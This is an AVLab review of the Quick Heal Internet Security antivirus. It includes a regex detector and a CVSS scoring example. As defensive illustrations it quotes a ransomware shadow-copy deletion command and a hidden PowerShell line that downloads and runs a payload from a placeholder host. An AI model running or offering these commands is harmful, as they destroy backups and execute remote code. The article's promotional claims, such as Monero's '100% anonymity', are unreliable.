Quick Heal Internet Security: a new anti-virus in Poland with a promo for AVLab readers

Quick Heal Internet Security BOX
Developer: Quick Heal
Product name: Quick Heal Internet Security
Tested version: 7.2


Conclusions

Quick Heal Internet Security (and Quick Heal Total Security) is a multi-layered protection application that meets the standards of a demanding user. It is also the answer to the whole spectrum of malware and most of the attacks that we describe on the AVLab website.

Editor's opinion

4.5

We start unusually, with the promotion we have prepared with the Polish distributor of Quick Heal solutions: if Quick Heal Technologies Ltd. is not known to you, dear Readers, there will be no better opportunity to catch up and get free protection from Quick Heal Internet Security in Polish. Details can be found at the end of the article.

Until recently, only a few enthusiasts in Poland knew anything about Quick Heal - a provider of software and hardware for network and workstation protection from India. At the end of 2016, through the distributor ITD24 Sp. z o.o., the business antivirus brand Quick Heal Seqrite came to Poland, and with it the product reviewed below, Quick Heal Internet Security for individual users and small businesses.

The translated interface already contains information about technical support in our country:

Quick Heal Internet Security technical support

The Quick Heal brand software has official distribution in Poland, with pre-sales and after-sales support. And although the competition is very strong, the Indians - a nation as hard-working as Poles - have not been scared off. The distance of 5300 km that separates our capitals in a straight line on the map is not something that cannot be overcome in the 21st century.

Quick Heal is a large company with traditions dating back to the '90s. It currently employs over 1,300 people who are involved in creating or delivering comprehensive services and security products for business and individual customers.

Quick Heal Internet Security interface

The company Quick Heal was founded in 1995. At the moment, the software of this brand has over 7.1 million active licenses in 80 countries around the world. About 1 million are Quick Heal Total Security licenses - a product targeted at individual customers and micro companies. The counting method assumes that a license covering the protection of, e.g., 5 or 1000 workstations is treated as one customer. Hence the actual number of protected users is difficult to estimate.

Quick Heal employees have achieved international success, using the previous years to attract 20,000 partners and establish numerous branches in 64 countries. Without extensive experience, ideas for development and effective security technologies, this would not have been possible. The market very quickly exposes all imperfections, especially in the private sector, where the highest product quality and a high level of service must come first.

Quick Heal Technologies Ltd. operates not only in the computer industry. A strong sense of responsibility for the local community has made the provider willing to help, to support the development of education, and to protect against digital threats and the effects of using modern technologies for negative purposes. Founded in 2014, the Quick Heal Foundation is a private initiative employing over 600 volunteers. Among others, the foundation helps those far away from urbanized areas who lack "medical facilities and sanitary facilities".

Quick Heal Foundation

Quick Heal Internet Security for Windows 2000 and XP onward

Although Microsoft has ended support for older operating systems, replacing them with Windows 10, there are still many companies and users in the world that are in no hurry to switch to the "ten" - a system that is constantly updated and was initially unfinished. The following statistics do not include business versions of Windows operating systems:

Statistics

According to the statistics provided, in Poland from January 2017 to the end of December 2017, Windows XP still had its supporters. Although it faces competition from Windows 10 (41.29%), the slowly declining Windows 7 (38.99%) and Windows 8.1 (11.7%), Windows XP, with a modest market share of 4.24%, still occupies fourth place among the most popular systems for desktop computers and older laptops. Only Windows 8 (2.41%) and Windows Vista (1.33%) score lower.

Quick Heal is not in a hurry to abandon support for the (most) older systems and so far there is no such official information - commented Patryk Czubasiewicz, Technical Support Engineer ITD24, the official distributor of the Quick Heal brand in Poland.

Windows XP, Vista, 7, 8 and 8.1 together make up a large chunk of the market. It is therefore good that someone remembers the users of older operating systems, who equally require uncompromising protection against malicious software.

Fewer ransomware attacks, but more and more malicious JavaScript

One of the most important functions of antivirus software is preventing ransomware attacks and remedying their effects. If the protection mechanisms as a whole are the first line of defence, the second most secure way to protect data is to keep a local (or cloud) backup. The backup mechanism built into the Quick Heal antivirus is additionally protected against encryption and deletion, and - unlike the system mechanism - the backup cannot be deleted with the command that ransomware runs:

"C:\Windows\SYsWOW64\cmd.exe" /C "C:\Windows\Sysnative\vssadmin.exe" Delete Shadows /All /Quiet

The number of ransomware variants and samples is not as large as it used to be:

Ransomware statistics

For several months we have not heard about a large and spectacular attack exploiting a new vulnerability in the operating system. However, due to the damage they do, encryption viruses are still a serious threat.

Every Quick Heal antivirus product actively protects against malware, including ransomware, in several steps:

  • Monitors downloaded files and components that could become part of an attack (e.g., a portion of the virus can be delivered as a downloader or Trojan).
  • Analyzes the real-time behavior of a file in the system (DNAScan).
  • Backs up data so that it can be restored to its original state in case the protection fails. Such a copy is encrypted with an internal algorithm developed by Quick Heal, which protects the data against access by third-party processes.

The Quick Heal Internet Security solution has multi-layered security. Protection against ransomware is just one of several important components. And as befits uncompromising protection, Quick Heal deals with spyware, adware, keyloggers, Trojans and other malware families.

Threats hidden in JavaScript code

In the last 2-3 months, we have been publishing more and more reports about detected malware mining the Monero cryptocurrency. Cybercriminals do not focus much on Bitcoin. The Monero mining algorithm is designed for desktop computers, unlike Bitcoin, which requires specialized hardware such as application-specific integrated circuits (ASICs) or high-end graphics processors. It is therefore easier to focus on this cryptocurrency, which allows broader campaigns that bring a steady but lower income. The second reason is Monero's promise of anonymous transactions: it uses so-called stealth addresses together with transaction mixing, so detailed transparency of transactions and wallets does not exist. Unlike Bitcoin (which does not provide 100% anonymity, because transactions can be traced from a BTC wallet address), Monero guarantees true, 100% anonymity.

The rapid increase in interest in cryptocurrencies is clearly seen in the statistics provided by ESET, where threats detected by this vendor's antivirus as JS/CoinMiner account for as much as 33% of all threats detected in the last month in Poland:

JavaScript miner statistics

It is difficult to protect yourself against malicious JavaScript without the right tools. Internet users may not even know that their computer "mines" cryptocurrency. You can come across such "viruses" by watching TV series and films on unauthorized websites, but not only there: recently, similar malicious code was discovered, among others, on the mobile site MobileBlackberry.com, on the Polish news service Rzeczpospolita.pl, and on the website of the Kołbaskowo commune office. There are many such examples.

You can protect yourself by installing an appropriate browser extension or by protecting your computer against JavaScript miners.

Quick Heal blocking JavaScript miners

Do not forget about the firewall and the IDS / IPS system

If we were to name a protection component that is often overlooked and underestimated but plays an important role in protection, it would be a firewall with built-in intrusion protection (IDS / IPS, from Intrusion Detection System / Intrusion Prevention System).

Quick Heal Internet Security has an IPS / IDS system for protection against intruders similar to that of the hardware product Quick Heal Seqrite UTM Terminator, which is designed for business. Blocking of unauthorized attacks by the IDS / IPS module in the Quick Heal Internet Security software is enabled by default:

Quick Heal Internet Security IPS

Why is a firewall with a built-in IPS / IDS module so important? Probably everyone knows that the antivirus engine protects against malicious files. However, in advanced attacks that use more sophisticated methods than social engineering - mainly attacks on unprotected and unpatched protocols (mainly SMB), browsers and browser extensions - firewalls with IPS / IDS modules play a very important role in security.

A bi-directional firewall with an intrusion detection system can detect ARP table poisoning attacks, fake PING requests, attacks that modify DNS entries, attacks on vulnerabilities in SMB, RPC and RDP, and port scanning. It protects your home network from malware and stops malware before it installs on your system, including protection against downloading dangerous files via CMD.exe or PowerShell.exe (system processes very often used in malware code).

An example of malicious code that downloads malware to the computer via the powershell.exe system process:

powershell.exe -nop -w hidden -c $H=new-object net.webclient;$H.proxy=[Net.WebRequest]::GetSystemWebProxy();$H.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $H.downloadstring('hxxp://zainfekowany_zasob:8080/pobierz_payload');
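
The two command lines quoted in this article (the shadow-copy deletion run by ransomware and the PowerShell download above) can be recognised in process-creation logs. The following is an added detection example, not code from Quick Heal or AVLab; the trait names and the two benign sample lines are constructed for illustration.

```python
import re

# Constructed process-creation records. The first two command lines are the
# ones quoted in the article; the last two are constructed benign look-alikes.
SAMPLE_EVENTS = [
    r'"C:\Windows\SYsWOW64\cmd.exe" /C "C:\Windows\Sysnative\vssadmin.exe" Delete Shadows /All /Quiet',
    "powershell.exe -nop -w hidden -c $H=new-object net.webclient;"
    "$H.proxy=[Net.WebRequest]::GetSystemWebProxy();"
    "$H.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $H.downloadstring('hxxp://zainfekowany_zasob:8080/pobierz_payload');",
    r"C:\Windows\System32\vssadmin.exe list shadows",
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users",
]

SHADOW_DELETE = re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b")
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b")
# PowerShell accepts abbreviated parameter names, so match on prefixes.
PS_TRAITS = {
    "no_profile": re.compile(r"\s-nop[a-z]*\b"),
    "hidden_window": re.compile(r"\s-w[a-z]*\s+hidden\b"),
    "web_download": re.compile(r"downloadstring|downloadfile|invoke-webrequest"),
    "dynamic_exec": re.compile(r"\biex\b|invoke-expression"),
}

def normalize(cmdline):
    """Lower-case, drop quotes and cmd.exe carets, collapse whitespace."""
    s = cmdline.lower().replace('"', "").replace("^", "")
    return re.sub(r"\s+", " ", s).strip()

def classify(cmdline):
    """Return the list of findings for one command line (empty if benign)."""
    s = normalize(cmdline)
    findings = []
    if SHADOW_DELETE.search(s):
        findings.append("shadow_copy_deletion")
    if POWERSHELL.search(s):
        traits = sorted(n for n, rx in PS_TRAITS.items() if rx.search(s))
        # A download plus in-memory execution is the core of the pattern;
        # the other traits are reported as supporting context.
        if "web_download" in traits and "dynamic_exec" in traits:
            findings.append("powershell_download_cradle:" + ",".join(traits))
    return findings

def scan(events):
    """Return {event_index: findings} for events with at least one finding."""
    results = {}
    for index, cmdline in enumerate(events):
        findings = classify(cmdline)
        if findings:
            results[index] = findings
    return results

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(index, findings)
```

Listing shadow copies and running an ordinary PowerShell command with -NoProfile are not flagged; only the delete operation and the download-and-execute combination are.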

The user still has the most important role to play in effective protection. Keeping track of all this information about attacks and malware is part of the work of administrators. It is not always something that an average internet user would like to do. For this reason, multi-functional, multi-layered protective software still remains the best investment.

If you are interested in how Quick Heal coped in recent comparisons carried out by AVLab, you should familiarize yourself with the protection tests: against drive-by download attacks and against "fileless" viruses.

Internet banking and secure browser

At the turn of January and February 2017, we tested a few antivirus products that have so-called modules for securing online e-payments.

The purpose of this test was to check the effectiveness of the protection that so-called "secure browsers" should provide against hacker attacks and data theft when making e-transfers and browsing websites whose security is confirmed by SSL certificates.

We admit that at that time Quick Heal anti-viruses did not play the role in Poland that they do today. The manufacturer, having learned about the test, contacted us and assured us that the Quick Heal Internet Security software would do well in this comparison.

Quick Heal Internet Security banking

In the "Safe Banking" module, we liked the protection against substitution of DNS addresses, which is additionally strengthened by protection of the local HOSTS file (this file supports the translation of user-friendly domain names into IP addresses):

Virtual Safe Banking environment with Quick Heal.

There have often been cases where a poorly secured router was "hacked" by an internet script that logged in with the default administrator credentials. The DNS addresses replaced on the router caused Internet traffic from devices in the local network to pass through the attacker's server - the attacker could decrypt SSL communication and read logins, passwords and other important data, and substitute bank or social network websites. Data collected in this way could be used to attack friends of the hacked person.

Using Secure Banking in Quick Heal prevents such attacks. Despite the changed DNS addresses on the router, the static values on the host take priority when establishing the IP address of the server that translates human-friendly addresses into the IP addresses of websites.

In Quick Heal Internet Security, we will find another security-enhancing feature: a "browser" that runs in a sandbox.

Quick Heal Sandbox

In this scenario, the user's default browser is run in a virtual environment inside the system. After visiting an infected site, the virus is confined to the virtual space and is not able to affect the operation of the operating system (leaving aside the scenario in which malicious code escapes the sandbox through security flaws). After the program is closed, all changes made to this environment are removed and do not affect the operation of the system.

Even more modules and tools

In the program, we will find even more modules that will surely find their supporters. These are:

Quick Heal additional tools

  • Protection against SPAM messages that works with installed e-mail clients. It detects viruses, malicious hyperlinks and senders impersonating trusted entities in incoming and outgoing messages.
  • A scanner detecting outdated software that can be used to bypass security. The mechanism can detect irregularities in the operating system settings. When the scan finishes, detailed information about CVE vulnerability IDs is displayed, which should be appreciated by people particularly interested in security:

Quick Heal Internet Security problems

The Quick Heal Internet Security software lists all vulnerabilities in detail:

Quick Heal vulnerability scanner

Sample scan report for vulnerabilities in the system and installed software:

Security number:
CVE-2017-3737

Name of the vulnerability:
Vulnerability in OpenSSL 1.0.2 before 1.0.2n (CVE-2017-3737)

Threatened products:
OpenSSL

Threatened platforms:
Microsoft Windows XP, Microsoft Windows Vista, Microsoft Windows 7,  Microsoft Windows 8, Microsoft Windows 8.1, Microsoft Windows 10, Microsoft Windows Server 2003, Microsoft Windows Server 2008, Microsoft Windows Server 2008 R2, Microsoft Windows Server 2012, Microsoft Windows Server 2012 R2, Microsoft Windows Server 2016

The vulnerability source:
Plik: C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\ssleay32.dll
Plik: C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\ssleay32.dll
Plik: C:\Program Files\VMware\VMware Tools\ssleay32.dll
Plik: C:\Program Files\VMware\VMware Tools\VMware VGAuth\ssleay32.dll

Ability to abuse and consequences:
Abuse mechanism: Network
Complexity of abuse: Medium
Abuse Authentication: None
Impact on confidentiality: Partial
Impact on integrity: None
Impact on availability: None

References:
BID: http://www.securityfocus.com/bid/102103
SECTRACK: http://www.securitytracker.com/id/1039978
FREEBSD: https://security.FreeBSD.org/advisories/FreeBSD-SA-17:12.openssl.asc
CONFIRM: https://security.netapp.com/advisory/ntap-20171208-0001/
DEBIAN: https://www.debian.org/security/2017/dsa-4065
CONFIRM: https://www.openssl.org/news/secadv/20171207.txt
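
The "Ability to abuse and consequences" fields of the report above use the vocabulary of the CVSS v2 base metrics, so they can be turned into a vector string and a base score for prioritisation. The following is an added example, not output or code from Quick Heal; the mapping from the report's translated labels to CVSS v2 metrics is an assumption.

```python
# CVSS v2 base-metric weights from the CVSS v2 specification.
WEIGHTS = {
    "AV": {"local": 0.395, "adjacent network": 0.646, "network": 1.0},
    "AC": {"high": 0.35, "medium": 0.61, "low": 0.71},
    "Au": {"multiple": 0.45, "single": 0.56, "none": 0.704},
    "C": {"none": 0.0, "partial": 0.275, "complete": 0.660},
}
WEIGHTS["I"] = WEIGHTS["A"] = WEIGHTS["C"]  # same scale for all three impacts
ORDER = ("AV", "AC", "Au", "C", "I", "A")

# Assumption: how the report's translated labels map onto CVSS v2 metrics.
LABELS = {
    "abuse mechanism": "AV",
    "complexity of abuse": "AC",
    "abuse authentication": "Au",
    "impact on confidentiality": "C",
    "impact on integrity": "I",
    "impact on availability": "A",
}

# Impact section copied from the sample report in the article.
REPORT = """\
Abuse mechanism: Network
Complexity of abuse: Medium
Abuse Authentication: None
Impact on confidentiality: Partial
Impact on integrity: None
Impact on availability: None
"""

def parse_report(text):
    """Map report lines to {metric: value}; reject unknown or missing fields."""
    metrics = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        metric = LABELS.get(label.strip().lower())
        if not sep or metric is None:
            continue  # not one of the six base-metric lines
        value = value.strip().lower()
        if value not in WEIGHTS[metric]:
            raise ValueError(f"unknown value {value!r} for {metric}")
        metrics[metric] = value
    missing = [m for m in ORDER if m not in metrics]
    if missing:
        raise ValueError(f"report lacks metrics: {missing}")
    return metrics

def vector(metrics):
    """Build the CVSS v2 vector string, e.g. AV:N/AC:M/..."""
    return "/".join(f"{m}:{metrics[m][0].upper()}" for m in ORDER)

def base_score(metrics):
    """CVSS v2 base equation, rounded to one decimal place."""
    w = {m: WEIGHTS[m][metrics[m]] for m in ORDER}
    impact = 10.41 * (1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"]))
    exploitability = 20 * w["AV"] * w["AC"] * w["Au"]
    f_impact = 0.0 if impact == 0 else 1.176
    return round((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact, 1)
```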

Other tools include:

  • Parental control with application control.
  • Module that restores Internet Explorer settings that have been modified by the malware.
  • Module that detects and removes temporary files and traces of Internet activity.
  • Module for creating a repair disk.
  • Module for manual diagnostics of running processes (displays details about each currently running process).

Quick Heal Internet Security: is it worth it?

Let's turn for a moment to the effectiveness of protection. Apart from the tests carried out by AVLab [ 1 and 2 ], in which the Quick Heal software received the highest BEST +++ distinction, readers should also read the ratings from other IT portals and companies specializing in tests. Besides:

Quick Heal Internet Security (and the more extensive version, Quick Heal Total Security) is a multi-layered protection application that meets the standards of a demanding user. It is also the answer to a wide spectrum of malware and most of the attacks that we describe on the pages of the AVLab portal. Polish customers will certainly be pleased that the Quick Heal brand has official distribution in our country and technical support provided by certified engineers. And if technical assistance in the designated zone does not meet high customer requirements, you can always use chat or email to contact the manufacturer directly. In this case, support is offered in the "follow the sun" model, i.e. 24 hours a day, regardless of the location in the world.

To broaden your knowledge of Quick Heal products, we recommend reading other articles about the developer, Quick Heal.

Special promotion for AVLab readers - 6 months FREE

On the occasion of the Quick Heal Internet Security review, a special promotion for AVLab readers prepared by the distributor in Poland could not be missing. This time it is not a competition or a one-off discount, but a campaign that lasts until further notice:

By downloading the installer from this URL: http://download.quickheal.com…, everyone will be able to use the free and fully functional version of Quick Heal Internet Security for 6 months.




We use the Google Cloud Translation and Gengo APIs to translate articles, with the exception of our comparative tests.